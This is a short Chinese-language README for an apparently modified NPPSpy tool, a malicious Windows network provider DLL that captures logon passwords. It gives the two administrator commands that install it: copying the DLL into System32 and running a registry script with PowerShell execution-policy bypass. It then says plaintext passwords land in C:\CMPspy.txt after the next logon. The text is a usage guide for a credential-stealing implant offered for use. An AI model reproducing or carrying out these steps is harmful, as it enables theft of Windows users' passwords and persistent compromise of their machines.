基于 https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy ,增加了LogonDomainName和Kerberos:Interactive 的支持。
管理员权限执行如下两条命令即可。
copy .\NPPSPY.dll C:\windows\System32\
powershell.exe -Exec Bypass .\ConfigureRegistrySettings.ps1注销后,重新登陆,明文密码就存放在C:\CMPspy.txt文件中。